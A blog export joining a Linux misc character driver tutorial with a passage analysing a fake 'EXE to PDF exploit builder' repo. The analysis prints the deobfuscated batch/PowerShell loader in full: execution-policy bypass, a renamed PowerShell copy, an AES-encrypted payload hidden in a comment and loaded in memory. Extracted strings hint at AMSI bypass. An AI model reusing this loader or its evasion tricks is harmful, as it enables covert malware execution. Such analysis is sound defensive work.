R R R D S N W P E A A L R C E E Now we know what are device drivers and how do they fit in the bigger picture. But that\u0026rsquo;s not all!\nIn linux, these device drivers are usually implemented as kernel modules, that provides an interface between the actual hardare device and the userspace \u0026ldquo;files\u0026rdquo;. On the basis of speed, volume and way of organizing the data to be transfered from userspace to the device and vice versa, device drivers are categorized under 2 types. (Note:- There is one more type of device called network device, but for this article it\u0026rsquo;s better to not start discussing about those)\nCharacter devices (Slow and manages small amount of data; used for keyboards, mouse, etc) Block devices (Fast and can manage bulk data with ease and efficiency; used mainly for storage devices) A typical linux ls -l command gives us a lot of information about the kind of device each file is.\nls -l /dev ## Output (snipped) # lrwxrwxrwx 1 root root 3 Sep 16 19:56 cdrom -\u0026gt; sr0 # brw-rw---- 1 root disk 8,0 Sep 16 19:56 sda # brw-rw---- 1 root disk 8,1 Sep 16 19:56 sda1 # brw-rw---- 1 root disk 8,2 Sep 16 19:56 sda2 # brw-rw----+ 1 root optical 11,0 Sep 16 19:56 sr0 # crw--w---- 1 root tty 4,0 Sep 16 19:56 tty0 # crw-rw-rw- 1 root root 1,5 Sep 16 19:56 zero First character of each line from the above output gives the type of the file it is, for example:\nl indicates that the file is a link file. b is the indicator for block device. c is for the character device. Another important thing this gives out are unique identifiers associated with each device. These identifiers consists of two comma separated numbers - major number and minor number.\nMajor number tells about the driver associated with the device. In the output above, sda, sda1 and sda2 all are managed by driver 8. The kernel uses the major number at open time to dispatch execution to the appropriate driver. While the minor number is used by driver (specified by major number) to differentiate among multiple devices handled by the driver.\nIf you wish to read more about this, here is a good article about major and minor numbers.1\nAt this point we can take a guess that these numbers are not random numbers, but they have a meaning to it. Here 2 is the official registry of allocated devices numbers which we will have to keep in mind before writing a device driver.\nWhat is a misc char device driver?? Well, it\u0026rsquo;s quite clear, isn\u0026rsquo;t it? A Misc driver is a driver that is used for miscellaneous devices. 🤭🤭\nThey mostly behave like a char drivers, but they are unique in that we don\u0026rsquo;t need to worry about all the complicated number registration issues. We can simply write our driver module and assign it a static minor number or ask kernel to provide a dynamic minor number. All the misc devices have common major number 10. And just like char device, it supports all the file operation calls like open, read, write, close and IOCTL.\nThis is quite useful when we want to write a basic driver for a simple functionality and save ourselves from the mess of allocating and registering a major number.\nYour first misc char device driver In linux kernel source, struct miscdevice is defined in linux/miscdevice.h file\nstruct miscdevice { int minor; const char *name; const struct file_operations *fops; struct list_head list; struct device *parent; struct device *this_device; const struct attribute_group **groups; const char *nodename; umode_t mode; }; For this task, we will need only 3 members of the above struct.\nint minor: To allocate the minor number, either static or dynamic. const char *name: To give the name to the device. const struct file_operations *fops : To allow custom file operations like read and write. This will allow us to write a basic module that will work as misc device driver that can be loaded and unloaded from the kernel. Create a file with name misc_char_device_driver.c and paste the below code in that.\n#include \u0026lt;linux/miscdevice.h\u0026gt; #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/init.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; // message formatting - optional #define pr_fmt(fmt) KBUILD_MODNAME \u0026#34;: \u0026#34; fmt // Device name #define MISC_DEVICE_NAME \u0026#34;eudyptula\u0026#34; // Misc Device structure static struct miscdevice my_misc_device = { .minor = MISC_DYNAMIC_MINOR, .name = MISC_DEVICE_NAME, }; // Entry point static int hello_world_init(void) { int ret = misc_register(\u0026amp;my_misc_device); pr_info(\u0026#34;Hello from module; Return %d\\n\u0026#34;, ret); if (ret \u0026lt; 0) return -EFAULT; return 0; } // Exit point static void hello_world_exit(void) { misc_deregister(\u0026amp;my_misc_device); pr_info(\u0026#34;Exiting from module\\n\u0026#34;); } module_init(hello_world_init); module_exit(hello_world_exit); MODULE_LICENSE(\u0026#34;GPL\u0026#34;); MODULE_AUTHOR(\u0026#34;ayedaemon\u0026#34;); MODULE_DESCRIPTION(\u0026#34;Eudyptula task6\u0026#34;); Compile and load module using below Makefile\nKDIR := /lib/modules/$(shell uname -r)/build all: clean build install build: $(MAKE) -C $(KDIR) M=$(PWD) modules clean: uninstall $(MAKE) -C $(KDIR) M=$(PWD) clean install: - sudo insmod misc_char_device_driver.ko sudo lsmod | grep misc_char_device_driver uninstall: - sudo rmmod misc_char_device_driver After compiling the above module and loading it, this will give me a character device in the /dev/ directory.\ncrw------- 1 root root 10, 122 Sep 17 13:21 /dev/eudyptula We can see that the file is a character type because of the initial c indicator. Also the major number is 10, which is the common major number for all misc devices. The minor number in our case is random but if you want feel free to allocate a static one.\nWhen loading and unloading this module, it\u0026rsquo;ll also create some logs because of the pr_info function calls. These logs can be viewed via dmesg | grep misc_char_device_driver command.\n[17543.585039] misc_char_device_driver: Hello from module; Return 0 [17583.624421] misc_char_device_driver: Exiting from module Adding file operations to driver Now we have a working character device that just exists but it does not support any file operations at this point. We can add the required file operations using the const struct file_operations *fops member of struct miscdevice. In linux kernel, struct file_operations is defined at linux/fs.h file. There are many file operations that are supported but we only need read and write for now.\nOur new code will look something like this\n// SPDX-License-Identifier: GPL-2.0+ #include \u0026lt;linux/miscdevice.h\u0026gt; #include \u0026lt;linux/fs.h\u0026gt; #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/init.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; // message formatting #define pr_fmt(fmt) KBUILD_MODNAME \u0026#34;: \u0026#34; fmt // Device name #define MISC_DEVICE_NAME \u0026#34;eudyptula\u0026#34; // Custom read operation static ssize_t misc_read(struct file *filp, char __user *buff, size_t cnt, loff_t *offt) { pr_info(\u0026#34;Read operation performed\\n\u0026#34;); return cnt; } // Custom write operation static ssize_t misc_write(struct file *filp, const char __user *buff, size_t cnt, loff_t *offt) { pr_info(\u0026#34;Write operation performed\\n\u0026#34;); return cnt; } // Operations structure const struct file_operations misc_fops = { .read = misc_read, .write = misc_write, }; // Misc Device structure static struct miscdevice my_misc_device = { .minor = MISC_DYNAMIC_MINOR, .name = MISC_DEVICE_NAME, .fops = \u0026amp;misc_fops, }; // Entry point static int hello_world_init(void) { int ret = misc_register(\u0026amp;my_misc_device); pr_info(\u0026#34;Hello from module; Return %d\\n\u0026#34;, ret); if (ret \u0026lt; 0) return -EFAULT; return 0; } // Exit point static void hello_world_exit(void) { misc_deregister(\u0026amp;my_misc_device); pr_info(\u0026#34;Exiting from module\\n\u0026#34;); } module_init(hello_world_init); module_exit(hello_world_exit); MODULE_LICENSE(\u0026#34;GPL\u0026#34;); MODULE_AUTHOR(\u0026#34;ayedaemon\u0026#34;); MODULE_DESCRIPTION(\u0026#34;Eudyptula task6\u0026#34;); After compiling the above module and loading it, this will provide additional functionality of read and write on the device. This can be tested by reading and writing to the /dev/eudyptula device now.\n## Read operation dd if=/dev/eudyptula of=/dev/null count=1 ## Output in `dmesg` # [23375.547714] misc_char_device_driver: Read operation performed ## Write operation dd if=/dev/zero of=/dev/eudyptula count=1 ## Output in `dmesg` # [23353.947901] misc_char_device_driver: Write operation performed Userspace \u0026lt;\u0026ndash;[data]\u0026ndash;\u0026gt; kernel module Now it\u0026rsquo;s time for the ultimate move, we have a misc character device driver that supports read and write operations to it, but it actually doesn\u0026rsquo;t send any data from kernel to userland and vice-versa. This is because there is no shared memory where we can simply pass the variables or pointers to the location and do whatever we intend to do it.\nThings are a bit different when have to transfer data between a kernel layer and userspace. Complete explaination is out of the scope for this article, but the short version is that the transfer is done with the help of 2 buffers, one on the kernel and other on the userspace. The userspace programs fill data in their buffer and address to that buffer is passed to the kernel. The kernel then uses that buffer to copy data to it\u0026rsquo;s own buffer and with that we are done. Here is a stackoverflow thread on the same topic.\nBut we need not to worry about all this complexity, for us it\u0026rsquo;ll be as hard as calling the copy_from_user() 3 and copy_to_user() 4 function from our kernel module.\nWith this, our new read and write functions will look something like below:-\n// Custom read operation static ssize_t misc_read(struct file *filp, char __user *buff, size_t cnt, loff_t *offt) { char *my_id = \u0026#34;ayedaemon\\n\u0026#34;; int my_id_len = strlen(my_id)+1; pr_info(\u0026#34;[begin] offt=%ld\\n\u0026#34;, *offt); if (*offt != 0) return 0; if ((cnt \u0026lt; my_id_len) || // Check the size (copy_to_user(buff, my_id, my_id_len))) // Copy to buffer return -EINVAL; *offt += cnt; pr_info(\u0026#34;[ end ] offt=%ld\\n\u0026#34;, *offt); return cnt; } // Custom write operation static ssize_t misc_write(struct file *filp, const char __user *buff, size_t cnt, loff_t *offt) { char *my_id = \u0026#34;ayedaemon\u0026#34;; int my_id_len = strlen(my_id); char temp[my_id_len+1]; // size = 10; including the null byte if ((cnt != my_id_len+1) || // Check input size (mainly to prevent overflows) (copy_from_user(temp, buff, my_id_len)) || // Copy 9 bytes from userland (strncmp(temp, my_id, my_id_len))) // finally, compare 9 bytes return -EINVAL; else return cnt; } In the above code, read function first checks the size of the buffer and then copies the my_id value to userspace buffer. And in write function, we check input size, then copies the data from userspace to temp buffer and then compares the data to be same. There are other things in the code but those are for extra checks, just to make sure the module does not crash.\nWe can now test the code with our makefile and everything should be as we are expecting it to be.\n## Read the value from device cat /dev/eudyptula ## Output # ayedaemon #-=-=-=-=-=-=-=-=-=-=-=-=-=-= ## Write \u0026#34;ayedaemon\u0026#34; to the device echo \u0026#34;ayedaemon\u0026#34; \u0026gt; /dev/eudyptula ## Output - No output #-=-=-=-=-=-=-=-=-=-=-=-=-=-= ## Write anything apart from \u0026#34;ayedaemon\u0026#34; echo \u0026#34;something\u0026#34; \u0026gt; /dev/eudyptula ## Output - Gives error # bash: echo: write error: Invalid argument Now we have achieved the goal of this task, let\u0026rsquo;s check the formatting of the code so that it follows the proper coding conventions that linux kernels developers have set.\n./linux/scripts/checkpatch.pl -f misc_char_device_driver.c ## Output # total: 0 errors, 0 warnings, 99 lines checked # misc_char_device_driver.c has no obvious style problems and is ready for submission. Conclusion There are mainly 2 types of device drivers - character and block. But there are also network device drivers which are completely different from the ones we discussed here. This article tries to provide basic introduction to misc character devices and details about how to write your own driver. All the code can be found in the github repo here 5 for you to playaround.\nhttps://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch03s02.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/html/latest/admin-guide/devices.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/htmldocs/kernel-api/API---copy-from-user.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/htmldocs/kernel-api/API---copy-to-user.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://github.com/ayedaemon/eudyptula\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/09/eudyptula-task-6/","summary":"This is Task 06 of the Eudyptula Challenge ------------------------------------------ Nice job with the module loading macros, those are tricky, but a very valuable skill to know about, especially when running across them in real kernel code. Speaking of real kernel code, let\u0026#39;s write some! The task this time is this: - Take the kernel module you wrote for task 01, and modify it to be a misc char device driver. The misc interface is a very simple way to be able to create a character device, without having to worry about all of the sysfs and character device registration mess.","title":"Eudyptula Task 6"},{"content":"What is a malware? Malware, a portmanteu meaning malicious software, refers to any program that was created with the specific goal of doing harm. Your digital environment is vulnerable to a variety of terrible things, including attempts to compromise your computer or network, leak confidential data, and gain illegal access. These issues can occasionally be brought on by common software defects, but when malware is to blame, it poses a major risk to online users and businesses.\nYes, a virus is a malware.. Malware is an umbrella term, with virus being just one of types among many others.\nCommon obfuscation techniques? Obfuscation is a software engineering technique used by hackers and security teams mainly to conceal the written code. There are different motivations to use obfuscation, but their aim is the same – to make the source code unintelligible, difficult to comprehend, and interpret.\nFew of the common obfuscatons techniques involve\nDead-code insertion Code flow obfuscation Variable renaming String encryption etc.. Journey begins! I always like trying out new tools and understanding how they work behind the scenes. And about time I got my eyes on a github repo that said EXE TO PDF Exploit Builder.\nThis was enough to make me open the repo and look more into it. 😁\nLucifer on github This repo was owned by Luci441\u0026hellip; But for some reasons this looked suspecious to me.\nThe account is only few days old. The owner claims to be the owner of Hackforums. And it only had 6 followers\u0026hellip;. Hackforum twitter account had 11.2K Followers at the time of writing this blog. Anyways, I was more interested into looking how that EXE to PDF program worked. So I moved directly to the repo and looked at the source code. The README contained something that made me more suspecious\u0026hellip;\nWhy make such a tool obfuscated?? Why no VMs supported?? Who makes such a tool and intentionally make it unusable in VMs?\nAnd there is no how to get started section with this tool so I\u0026rsquo;ll have to read the code and understand it. Good heavens\u0026hellip; Finally I got started with the ExploitBuilder.bat file to read the source code.\nThere are a lot of things that raise doubt, but that\u0026rsquo;s not what why you are here. Are you?\nSimplifying initial payload After taking a look at all the files inside the repo, it was safe to assume that there was absolutely no need of the C header files (.h files). This was just to make everything a bit more convincing.\nFirst thing first, I forked the repo and removed all the extra files. The forked repo can be found here -\u0026gt; https://github.com/ayedaemon/Exe-to-pdf. Interestingly, there was a Pull Request to the original repo that mentioned about the malware it contained. But I won\u0026rsquo;t talk about it and ruin the journey ;)\nMost interesting file in the whole repo was the batchfile and it was obfuscated. The whole thing was divided into multiple variables and then the complete command was constructed at runtime by concatinating those jumbled strings. I gotta admit there is a lot one can do with strings nowadays.\nI cleaned most of the lines with sed and then printed them with python. Maybe there is a faster and better way to clean it.. I\u0026rsquo;ll be happy to hear if you have any alternative ways to do it easily.\nHere is the python notebook that shows the initial deobfuscation. \u0026ndash;\u0026gt; https://github.com/ayedaemon/Exe-to-pdf/blob/main/notebook.ipynb\nAfter this, I had the clean payload that was much much easier to read. Here is the clean payload \u0026ndash;\u0026gt; https://github.com/ayedaemon/Exe-to-pdf/blob/main/clean_payload.txt\n@echo off net file if not %errorlevel%==0 ( powershell -noprofile -ep bypass -command Start-Process -FilePath \u0026#39;%0\u0026#39; -ArgumentList \u0026#39;%cd%\u0026#39; -Verb runas \u0026amp; exit /b ) cd /d %1 copy C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe /y %~dp0%~nx0.exe\u0026#39; cls cd %~dp0 %~nx0.exe -noprofile -windowstyle hidden -ep bypass -command $eaqcw = [System.IO.File]::(\u0026#39;txeTllAdaeR\u0026#39;[-1..-11] -join \u0026#39;\u0026#39;)(\u0026#39;%~f0\u0026#39;).Split([Environment]::NewLine);foreach ($VtoBl in $eaqcw) { if ($VtoBl.StartsWith(\u0026#39;:: \u0026#39;)) { $BMjJe = $VtoBl.Substring(3); break; }; };$VGGCQ = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)($BMjJe);$hbvqO = New-Object System.Security.Cryptography.AesManaged;$hbvqO.Mode = [System.Security.Cryptography.CipherMode]::CBC;$hbvqO.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$hbvqO.Key = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)(\u0026#39;wYPqphQqHyVIeW2CaPqkTUCy/0ecJs6agKij7Q3HRY4=\u0026#39;);$hbvqO.IV = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)(\u0026#39;E55hmIoW8UIQx1ajzTvfAA==\u0026#39;);$CfOAS = $hbvqO.CreateDecryptor();$VGGCQ = $CfOAS.TransformFinalBlock($VGGCQ, 0, $VGGCQ.Length);$CfOAS.Dispose();$hbvqO.Dispose();$YVjlv = New-Object System.IO.MemoryStream(, $VGGCQ);$iJFSw = New-Object System.IO.MemoryStream;$uwkaq = New-Object System.IO.Compression.GZipStream($YVjlv, [IO.Compression.CompressionMode]::Decompress);$uwkaq.CopyTo($iJFSw);$uwkaq.Dispose();$YVjlv.Dispose();$iJFSw.Dispose();$VGGCQ = $iJFSw.ToArray();$WtHIs = [System.Reflection.Assembly]::(\u0026#39;daoL\u0026#39;[-1..-4] -join \u0026#39;\u0026#39;)($VGGCQ);$iFZWS = $WtHIs.EntryPoint;$iFZWS.Invoke($null, (, [string[]] (\u0026#39;%*\u0026#39;))) exit /b Let\u0026rsquo;s try and understand this script line by line\u0026hellip; just like an interpreter 😉\n@echo off prevents the prompt and contents of the batch file from being displayed, so that only the output is visible. The @ makes the output of the echo off command hidden as well. If you are into bad things or preventing bad things to happen - this is like a defacto starting command for all batch scripts.\nnet file without any extra argumnents this displays all the open shared files on a server and the lock-ids (if any). I\u0026rsquo;m not completely sure why this is used but anyways\nThen it checks errorlevel, it is not 0 then it\u0026rsquo;ll run some powershell command. I\u0026rsquo;m not very good with windows and it\u0026rsquo;s tools at this point but it is very clear that is executing something with -ep bypass to prevent any warnings or prompts. Sus it is, isn\u0026rsquo;t it?\nAfter changing directory (where it can put all his mess, without being sus), it copies the powershell binary and saves it with another name.\nClears the screen to remove all the output generated. Above tasks will be in a flash and you probably will just see a blink on terminal if you have Veronica Seider’s Super Power. Bad Joke, I know.\nEventually, it\u0026rsquo;ll use the copied \u0026amp; renamed powershell to run some -command with -ep bypass flag. After a bit of google-fu I got to know about few common techniques used to bypass powershell execution policy. I found this blog 1 concise and helpful for the same topic.\nde-obfuscating powershell I copied the powershell -command to another file, just to make more sense of it. And it looked better than before.\n$eaqcw = [System.IO.File]::(\u0026#39;txeTllAdaeR\u0026#39;[-1..-11] -join \u0026#39;\u0026#39;)(\u0026#39;%~f0\u0026#39;).Split([Environment]::NewLine); foreach ($VtoBl in $eaqcw) { if ($VtoBl.StartsWith(\u0026#39;:: \u0026#39;)) { $BMjJe = $VtoBl.Substring(3); break; }; }; $VGGCQ = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)($BMjJe); $hbvqO = New-Object System.Security.Cryptography.AesManaged; $hbvqO.Mode = [System.Security.Cryptography.CipherMode]::CBC; $hbvqO.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $hbvqO.Key = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)(\u0026#39;wYPqphQqHyVIeW2CaPqkTUCy/0ecJs6agKij7Q3HRY4=\u0026#39;); $hbvqO.IV = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)(\u0026#39;E55hmIoW8UIQx1ajzTvfAA==\u0026#39;); $CfOAS = $hbvqO.CreateDecryptor(); $VGGCQ = $CfOAS.TransformFinalBlock($VGGCQ, 0, $VGGCQ.Length); $CfOAS.Dispose(); $hbvqO.Dispose(); $YVjlv = New-Object System.IO.MemoryStream(, $VGGCQ); $iJFSw = New-Object System.IO.MemoryStream; $uwkaq = New-Object System.IO.Compression.GZipStream($YVjlv, [IO.Compression.CompressionMode]::Decompress); $uwkaq.CopyTo($iJFSw); $uwkaq.Dispose(); $YVjlv.Dispose(); $iJFSw.Dispose(); $VGGCQ = $iJFSw.ToArray(); $WtHIs = [System.Reflection.Assembly]::(\u0026#39;daoL\u0026#39;[-1..-4] -join \u0026#39;\u0026#39;)($VGGCQ); $iFZWS = $WtHIs.EntryPoint; $iFZWS.Invoke($null, (, [string[]] (\u0026#39;%*\u0026#39;))) If I did not mention this earlier, I\u0026rsquo;m not good with windows OS and powershell scripting, but with decent knowledge about programming/scripting languages and a text editor of choice, it was not so hard to make this code understandable. De-obfuscated file can be found on github here -\u0026gt; https://github.com/ayedaemon/Exe-to-pdf/blob/main/powershell_command_deobfuscated.txt\n## Read the initial payload file $payload = [System.IO.File]::(\u0026#39;txeTllAdaeR\u0026#39;[-1..-11] -join \u0026#39;\u0026#39;)(\u0026#39;/ExploitBuilder.bat\u0026#39;).Split([Environment]::NewLine); ## Get the line starting with `:: `; This also acts as the comment in batch scripting foreach ($each_line in $payload) { if ($each_line.StartsWith(\u0026#39;:: \u0026#39;)) { $comment_line = $each_line.Substring(3); break; }; }; ## Decode the comment line with \u0026#34;Military grade AES encryption\u0026#34; $decoded_comment_line = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)($comment_line); $cryptObj = New-Object System.Security.Cryptography.AesManaged; $cryptObj.Mode = [System.Security.Cryptography.CipherMode]::CBC; $cryptObj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $cryptObj.Key = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)(\u0026#39;wYPqphQqHyVIeW2CaPqkTUCy/0ecJs6agKij7Q3HRY4=\u0026#39;); $cryptObj.IV = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)(\u0026#39;E55hmIoW8UIQx1ajzTvfAA==\u0026#39;); $decryptObj = $cryptObj.CreateDecryptor(); $decrypted_comment_line = $decryptObj.TransformFinalBlock($decoded_comment_line, 0, $decoded_comment_line.Length); $decryptObj.Dispose(); $cryptObj.Dispose(); ## Shuffle the data throught memory streams and decompress it (gzip decompression) $decrypted_stream = New-Object System.IO.MemoryStream(, $decrypted_comment_line); $extra_stream = New-Object System.IO.MemoryStream; $ungzip_decrypted_stream = New-Object System.IO.Compression.GZipStream($decrypted_stream, [IO.Compression.CompressionMode]::Decompress); $ungzip_decrypted_stream.CopyTo($extra_stream); $ungzip_decrypted_stream.Dispose(); $decrypted_stream.Dispose(); $extra_stream.Dispose(); ## Load the final binary and execute it $asm = [System.Reflection.Assembly]::(\u0026#39;daoL\u0026#39;[-1..-4] -join \u0026#39;\u0026#39;)($decrypted_array); $asm_entrypoint = $asm.EntryPoint; $asm_entrypoint.Invoke($null, (, [string[]] (\u0026#39;%*\u0026#39;))) There are tons of obfuscation techniques that can be used by a hacker or a professional, but the final goal is common - To make it harder to read and interpret. Here is a blog by Offensive-Security on powershell obfuscation 2 that helped me to gain knowledge about how powershell malwares are usually obfuscated.\nThis malware specifically used some good techniques:-\nchanging the variable names to random characters String reversal techniques for powershell commands. Key based cryptography to encrypt the malicious payload. Compressing the payload to prevent detection Decompressing in memory streams to make it somewhat fileless and hard to detect. \u0026hellip;but the method employed to hide the payload in comments actually astounded me.\nWindows EXE file There were several steps within a single line powershell command, that were eventually loading and executing the actual malware. Instead of writing my own functions to reverse engineer everything the author has done, I took the lazy approach and let his code do most of the work\u0026hellip;and just before the loading \u0026amp; execution segment, I dumped the binary. 🤭\n## Dump exe file before loading and executing $result = [System.Text.Encoding]::UTF8.GetString($extra_stream.ToArray()) $result \u0026gt; extra_stream.exe.txt How I know it is an EXE file? \u0026hellip;Simply by looking at the magic numbers of the obtained file\nAll the obfuscation, just to make sure that this exe file gets executed. 🤦 Well, now it\u0026rsquo;s time to analyze the binary file we just extracted and see if we can figure out the truth about this EXE-to-pdf program. For this, I quickly launched up radare2 3 in another terminal and started analysing the file. Why Radare2?? I prefer stayting in the terminal\u0026hellip;And it is an amazing tool :)\nWhat does all Reverse Engineering 101 books say?? - grab some basic info about the binary file and dump all strings to support the existing hypothesis and build on it.\nSo I did that..\nBasic info\nfile extra_stream.exe.txt size 0x409f humansz 16.2K minopsz 1 maxopsz 16 invopsz 1 mode r-x format any iorw false block 0x100 Strings (omitted)\n211 0x0000271a 0x0000271a 20 21 ascii BJEtuQtQCkWlpTOkRPdJ 212 0x0000272f 0x0000272f 20 21 ascii OzLDUBlAcSBIOPOJLBlh 213 0x00002744 0x00002744 20 21 ascii BDltEFgkoicgcKNaARhF 214 0x00002759 0x00002759 20 21 ascii QvYrospzbuUnUAXNVABe 215 0x0000276e 0x0000276e 20 21 ascii joIOHkxVlAiZHoYgFUel 316 0x00002ce8 0x00002ce8 14 15 ascii RuntimeHelpers 317 0x00002cf7 0x00002cf7 5 6 ascii Array 318 0x00002cfd 0x00002cfd 18 19 ascii RuntimeFieldHandle 319 0x00002d10 0x00002d10 15 16 ascii InitializeArray 320 0x00002d20 0x00002d20 19 20 ascii $$method0x6000003-2 321 0x00002d34 0x00002d34 7 8 ascii UIntPtr 322 0x00002d3c 0x00002d3c 11 12 ascii op_Explicit 323 0x00002d48 0x00002d48 4 5 ascii Copy 324 0x00002d4d 0x00002d4d 17 18 ascii System.Reflection 325 0x00002d5f 0x00002d5f 8 9 ascii Assembly 326 0x00002d68 0x00002d68 20 21 ascii GetExecutingAssembly 327 0x00002d7d 0x00002d7d 24 25 ascii GetManifestResourceNames 328 0x00002d96 0x00002d96 13 14 ascii WriteAllBytes 329 0x00002da4 0x00002da4 16 17 ascii System.Threading 330 0x00002db5 0x00002db5 11 12 ascii ThreadStart 331 0x00002dc1 0x00002dc1 6 7 ascii Thread 332 0x00002dc8 0x00002dc8 4 5 ascii Char 333 0x00002dcd 0x00002dcd 5 6 ascii Split 334 0x00002dd3 0x00002dd3 4 5 ascii Load 335 0x00002dd8 0x00002dd8 10 11 ascii MethodInfo 336 0x00002de3 0x00002de3 14 15 ascii get_EntryPoint 337 0x00002df2 0x00002df2 10 11 ascii MethodBase 338 0x00002dfd 0x00002dfd 16 17 ascii ProcessStartInfo 339 0x00002e0e 0x00002e0e 6 7 ascii Concat 340 0x00002e15 0x00002e15 13 14 ascii set_Arguments 341 0x00002e23 0x00002e23 18 19 ascii ProcessWindowStyle 342 0x00002e36 0x00002e36 15 16 ascii set_WindowStyle 343 0x00002e46 0x00002e46 18 19 ascii set_CreateNoWindow 344 0x00002e59 0x00002e59 12 13 ascii set_FileName 345 0x00002e66 0x00002e66 11 12 ascii System.Core 346 0x00002e72 0x00002e72 28 29 ascii System.Security.Cryptography 347 0x00002e8f 0x00002e8f 10 11 ascii AesManaged 348 0x00002e9a 0x00002e9a 18 19 ascii SymmetricAlgorithm 349 0x00002ead 0x00002ead 10 11 ascii CipherMode 350 0x00002eb8 0x00002eb8 8 9 ascii set_Mode 351 0x00002ec1 0x00002ec1 11 12 ascii PaddingMode 352 0x00002ecd 0x00002ecd 11 12 ascii set_Padding 353 0x00002ed9 0x00002ed9 16 17 ascii ICryptoTransform 354 0x00002eea 0x00002eea 15 16 ascii CreateDecryptor 355 0x00002efa 0x00002efa 19 20 ascii TransformFinalBlock 356 0x00002f0e 0x00002f0e 12 13 ascii MemoryStream 357 0x00002f1b 0x00002f1b 21 22 ascii System.IO.Compression 358 0x00002f31 0x00002f31 10 11 ascii GZipStream 359 0x00002f3c 0x00002f3c 6 7 ascii Stream 360 0x00002f43 0x00002f43 15 16 ascii CompressionMode 361 0x00002f53 0x00002f53 6 7 ascii CopyTo 362 0x00002f5a 0x00002f5a 7 8 ascii ToArray 363 0x00002f62 0x00002f62 25 26 ascii GetManifestResourceStream 364 0x00002f7c 0x00002f7c 11 12 ascii payload.exe 365 0x00002f8a 0x00002f8a 34 69 utf16le Select * from Win32_ComputerSystem 373 0x00003070 0x00003070 44 89 utf16le Ok++WI0tak7DdF3uV9x+8O7wJaTIlfxMVTMno9KXut4= 374 0x000030ca 0x000030ca 44 90 utf16le +uLTyyminmCZeXdFSCeWyXEOtzicLz4HHy5dikdWUWc= 375 0x00003124 0x00003124 24 49 utf16le WTltvoM17r/Ehimm8ynucg== 376 0x00003156 0x00003156 44 89 utf16le amZLVSQJiUQKj6Rv/kTQ8kyn+kGd0mUv6VK0wS/w3/E= 377 0x000031b0 0x000031b0 14 29 utf16le VirtualProtect 378 0x000031ce 0x000031ce 8 18 utf16le amsi.dll 379 0x000031e0 0x000031e0 24 49 utf16le WG/Dged0cIrjNUQv5M9ONw== 380 0x00003212 0x00003212 9 20 utf16le ntdll.dll 381 0x00003226 0x00003226 24 50 utf16le KMgwS70BP93VTwRv09KJTQ== 382 0x00003258 0x00003258 24 50 utf16le ZoHIhlSGD8rN6cc5D8M/MA== 383 0x0000328a 0x0000328a 24 49 utf16le shwnMnkYp+bePn1r9fIgQg== 384 0x000032c3 0x000032c3 63 127 utf16le MNbxejM5jxzm3r5TKG6sPhlK6QF/D8w6/aOC8lz9bfMr26dy72cAJCSoDcBoN3Q 385 0x00003343 0x00003343 9 19 utf16le \u0026#34; \u0026amp; del \u0026#34; 386 0x0000335b 0x0000335b 7 16 utf16le cmd.exe There are base64 encoded strings, interesting function calls and interesting strings in this binary, which I can look up and figure out what this file does. It will be so easy!!\nBut to my surprise, it was not at all easy\u0026hellip; Or maybe I\u0026rsquo;m just not worthy yet.\nAll the base64 strings are not readable. Although I\u0026rsquo;ve a feeling that these strings are used in similar fashion as they were used in previous powershell payload.\nEven after looking in the memory area where the intriguing strings are pointed, I was unable to find anything that made sense to me.\n[0x00002f70]\u0026gt; pd 20 ; CODE XREF from fcn.00000000 @ +0x2f01 0x00002f70 6f outsd dx, dword [rsi] ┌─\u0026lt; 0x00002f71 7572 jne 0x2fe5 │ 0x00002f73 636553 movsxd rsp, dword [rbp + 0x53] ┌──\u0026lt; 0x00002f76 7472 je 0x2fea ││ 0x00002f78 65 invalid ││ 0x00002f79 61 invalid ││ 0x00002f7a 6d insd dword [rdi], dx ││ 0x00002f7b 007061 add byte [rax + 0x61], dh ┌───\u0026lt; 0x00002f7e 796c jns 0x2fec │││ 0x00002f80 6f outsd dx, dword [rsi] │││ 0x00002f81 61 invalid ┌────\u0026lt; 0x00002f82 642e657865 js 0x2fec ││││ 0x00002f87 0000 add byte [rax], al ││││ ; CODE XREFS from fcn.00000000 @ +0x2f15, +0x2f34 ││││ 0x00002f89 4553 push r11 ││││ 0x00002f8b 006500 add byte [rbp], ah ││││ 0x00002f8e 6c insb byte [rdi], dx ││││ 0x00002f8f 006500 add byte [rbp], ah ││││ 0x00002f92 6300 movsxd rax, dword [rax] ┌─────\u0026lt; 0x00002f94 7400 je 0x2f96 │││││ ; CODE XREF from fcn.00000000 @ +0x2f94 └─────\u0026gt; 0x00002f96 2000 and byte [rax], al Then I looked at the color patterns to figure out if it had repeated patterns\u0026hellip; I could then take it as a sign that this binary is itself encoded.\nNext Steps? There are numerous indicators right now that point to the possibility that this is malware, but who am I to judge? (based on what I currently 